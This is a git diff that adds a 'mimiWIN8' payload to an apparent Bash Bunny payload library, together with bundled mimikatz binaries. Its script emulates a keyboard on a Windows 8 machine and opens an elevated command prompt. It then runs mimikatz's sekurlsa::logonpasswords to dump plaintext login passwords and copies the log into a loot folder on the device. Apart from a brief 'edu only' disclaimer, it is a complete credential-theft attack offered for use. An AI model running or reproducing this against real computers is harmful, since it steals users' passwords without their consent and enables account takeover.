diff --git a/payloads/library/credentials/mimiWIN8/payload.txt b/payloads/library/credentials/mimiWIN8/payload.txt new file mode 100644 index 000000000..122b3817a --- /dev/null +++ b/payloads/library/credentials/mimiWIN8/payload.txt @@ -0,0 +1,63 @@ +#!/bin/bash +# +# Title: mimiWIN8 +# Author: DeDogeGod +# Version: 0.1 +# Cat: Creds +# Target: Windows 8 (No SE Update) +# Des: Take plain text windows 8 passwords within seconds with the bash bunny! +# Go to ____________ ti find the rubber ducky version which is faster. +# +# Runs a adimin bypass discoverd by darren kitchen to reach power 10+ +# This bypass only works with windows 8 with no SE updates. Use for edu only! +# I am not responisble for you using in dumb ass ways. +# +# Setup +# -------------------- +LED G +mkdir -p /root/udisk/loot/mimiWIN8save +ATTACKMODE HID STORAGE +# +# Stage 1 +# --------------------- +# Change Delays depending on how fast or slow the computer is. +# These delays are for a 64x windows lenovo yoga 2 slowed down version +LED Y +RUN WIN powershell Start-Process cmd -Verb runAs # Admin bypass for win8 +Q DELAY 100 +Q ENTER +Q DELAY 1650 +Q LEFTARROW +Q ENTER +Q DELAY 250 +Q STRING D: # Change D to your bashbunny letter in windows +Q ENTER +Q STRING cd tools # This will not work with 32 bit computers +Q ENTER +Q STRING m.exe +Q ENTER +Q DELAY 120 +Q STRING privilege::debug # Using admin bypass +Q ENTER +Q STRING log # Telling mimikatz to log everything I am doing +Q ENTER +Q DELAY 100 +Q STRING sekurlsa::logonpasswords # Getting password +Q ENTER +Q DELAY 370 +Q STRING exit # exting mimikatz +Q ENTER +Q DELAY 200 +Q STRING exit # exting cmd +Q ENTER +# +# Stage 2 +# -------------------- +LED M +cp /root/udisk/tools/mimikatz.log /root/udisk/loot/mimiWIN8save +Q DELAY 200 +# Done +# ----------------- +LED G + + diff --git a/payloads/library/credentials/mimiWIN8/tools/m.exe b/payloads/library/credentials/mimiWIN8/tools/m.exe new file mode 100644 index 000000000..f04c8aad6 Binary files /dev/null and b/payloads/library/credentials/mimiWIN8/tools/m.exe differ diff --git a/payloads/library/credentials/mimiWIN8/tools/mimidrv.sys b/payloads/library/credentials/mimiWIN8/tools/mimidrv.sys new file mode 100644 index 000000000..6b14b27fa Binary files /dev/null and b/payloads/library/credentials/mimiWIN8/tools/mimidrv.sys differ diff --git a/payloads/library/credentials/mimiWIN8/tools/mimilib.dll b/payloads/library/credentials/mimiWIN8/tools/mimilib.dll new file mode 100644 index 000000000..2e2d9b6c1 Binary files /dev/null and b/payloads/library/credentials/mimiWIN8/tools/mimilib.dll differ